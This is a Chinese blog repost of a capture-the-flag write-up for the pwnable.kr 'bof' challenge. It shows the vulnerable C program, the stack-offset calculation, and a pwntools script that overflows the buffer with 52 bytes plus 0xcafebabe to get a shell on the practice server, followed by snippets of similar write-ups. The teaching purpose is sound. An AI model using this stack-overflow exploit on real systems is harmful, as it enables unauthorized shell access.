【pwnable.kr】bof

最新推荐文章于 2021-03-02 22:54:36 发布
最新推荐文章于 2021-03-02 22:54:36 发布
阅读量114 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/p4nda/p/7100716.html
版权

pwnable从入门到放弃,第三题。

Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

很简单的一道栈溢出题目。

依然先读代码:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);    // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

在gets处有一个明显的栈溢出,溢出了overflowme变量。

目的是覆盖key变量,导致在if判断时,获得执行bash的权限。

 

用ida看看栈分配的结构吧

看到数组overflowme的起始地址在ebp+s(-2c),key参数的其实地址在ebp+arg0(+8),中间就差了44+8 = 52个字节。

因此使用52个‘A’覆盖之后再加上4字节的0xcafebabe,就可以了。

再次膜拜一发pwntools。

# -*- coding:utf-8 -*-  
import pwn
r = pwn.remote('pwnable.kr',9000)
r.send('a'*52+pwn.p32(0xcafebabe))
r.interactive()

之后就可以获得一个shell了。

 

 

ps:话说明天开始要做项目了 = =紧脏。

 

转载于:https://www.cnblogs.com/p4nda/p/7100716.html

1361976860
关注
pwnablebof
qq_43430261的博客
10-18 397
看代码 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafeb...
pwnable.kr-bof-Writeup
逐梦小涛
02-08 1798
MarkdownPad Document pwnable.kr-bof-Writeup 在http://pwnable.kr/bin/bof.c得到C代码如下: 1 #include 2 #include string.h> 3 #include 4 void func(int key){ 5 char overflowme[32]; 6 pri
pwnable.krbof
river
05-01 4428
bof   两种方法来做吧(就是入门为了练习,多接触一些。。。) 方法1:用ida直接看 算一下 输入的字符串s是ebp-2c 参数1 a1是ebp+8 距离是52,所以要覆盖52个字符。 但是这么简单的程序,抓住机会,小白练习一下gdb 方法2:用GDB调试,算参数地址 gdb bof
pwnable.kr第三题bof
07-25 164
Running at : nc pwnable.kr 9000 IDA查看 1 unsigned int __cdecl func(int a1) 2 { 3 char s; // [esp+1Ch] [ebp-2Ch] 4 unsigned int v3; // [esp+3Ch] [ebp-Ch] 5 6 v3 = __readgsdw...
pwn学习:pwnable.kr bof
Richard_pl的博客
03-12 473
Day 3: Study pwn via pwnable.kr——bof 写在前面: 记录自己的学习过程,从零开始。。。第三天!!! 首先下载文件 打开.c文件查看源码 可以看出本次的最终目标就是覆盖key值。漏洞可能在gets函数上。 使用gdb打开二进制文件 也可以通过IDA进行分析 打开文件,查看文件开启的保护措施并设置若干断点。 通过汇编程序查找到相关变量的地址 我们的最终目的...
Pwnable.kr题目Writeup持续更新~
iqiqiya的博客
03-12 2264
题目地址:https://pwnable.kr/play.php 第一题[fd]: Mommy! what is a file descriptor in Linux? * try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu....
BoF.tar.gz_BOF_bag of features
09-19
在提供的"BoF.tar.gz"压缩包中,"BoF"文件很可能包含了实现以上功能的Matlab脚本和函数。用户可以通过解压并运行这些脚本来理解和学习BoF模型的工作原理,同时也可以根据自己的需求进行修改和扩展,以适应不同的图像...
bof.rar_BOF
09-21
【标题】"BOF.rar" 是一个以 MFC(Microsoft Foundation Classes)库为基础的示例程序,主要展示了如何在Windows应用程序中使用按钮控件。"BOF" 可能是 "Buffer Overflow" 或 "Button Of Fun" 的缩写,但在这个上下...
pwnable.kr-bof
weixin_43464124的博客
11-20 588
第第第第第…三题了 首先看看题目: 按照题目要求,我们就先把bofbof.c下载下来看看吧(因为我还是习惯用Windows,而且我的ida也在Windows上,所以手动下载QAQ)。 打开看看: 不长的c程序,很简单的溢出。很明显直接按照他的方式key的值是无法system(&quot;/bin/sh&quot;)的,因此我们通过溢出覆盖掉这个key的值。但是我们只能通过输入overflow的值来溢出,所以我们看...
pwnable.kr bof
潜心学习
07-04 1184
pwnable.kr bof 同样的,既然有源代码。我们就配合着源代码来做题,这样可能更利于搞懂高级语言被反汇编之后两者之间的联系。 bof.c #include&nbsp;&lt;stdio.h&gt; #include&nbsp;&lt;string.h&gt; #include&nbsp;&lt;stdlib.h&gt; void&nbsp;func(int&nbsp;key)...
pwnable.kr [bof]
shisuan1的博客
11-25 221
pwnable.kr [bof] Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running ...
pwnable.krbof
leeham的博客
08-30 617
pwnable.krbof 这是一道缓冲区溢出的题目
Pwnable.kr bof [Writeup]
柷敔的博客
03-02 310
题源 https://pwnable.kr/play.php Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running at : nc pwnable.kr 9000 题解 Pwnable的第三道题,很
pwnable.kr-bof WP
Casuall的博客
03-24 5478
pwnable.kr-bof   这道题是一个简单的缓冲器溢出的题,首先要做这道题要对函数调用栈有一定的了解。 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶;在函数调用结束时,栈顶的函数(callee)状态被弹出,栈...
bof - pwnable
SkYe's Blog
08-19 451
bof - pwnable 1.获取题目 题目给出下载链接:程序文件;源码 2. 运行程序、查看文件类型、保护措施 在本地机上运行一下程序:运行提示需要输入一个passcode,随意输入一个密码提示Nah… 查看文件类型:是32位动态链接的elf 查看保护措施: 3.分析源码 因为题目有给出源码,所以先直接查看源码分析。 #include <stdio.h> #include &...
pwnable bof
weixin_30371469的博客
03-29 153
http://www.pwnable.kr/play.php 题目提供了二进制文件和源码,查看源码: #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overfl...
Pwnable.kr WP
AlexYoung28的博客
08-13 957
近期,开始将以前做的CTF的题目,全部整理一遍,写个WP,也是为了督促自己,还需要学的东西还有很多。 Pwnable.kr fd  我们首先看到这道题的C源码: 需要得到flag,则需要执行 system("/bin/cat flag"); 则 必须 buf = "LETMEWIN"。 read(fd, buf, 32)函数中的三个参数中: fd == 0时:则表示标准输入; ...
Java与OpenCV结合实现图像检索中的BOF算法
资源摘要信息:"Java+opencv实现bof图像检索算法" 知识点一:Java与OpenCV的结合 Java是一种广泛使用的高级编程语言,具有跨平台和面向对象的特性。OpenCV(Open Source Computer Vision Library)是一个开源的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值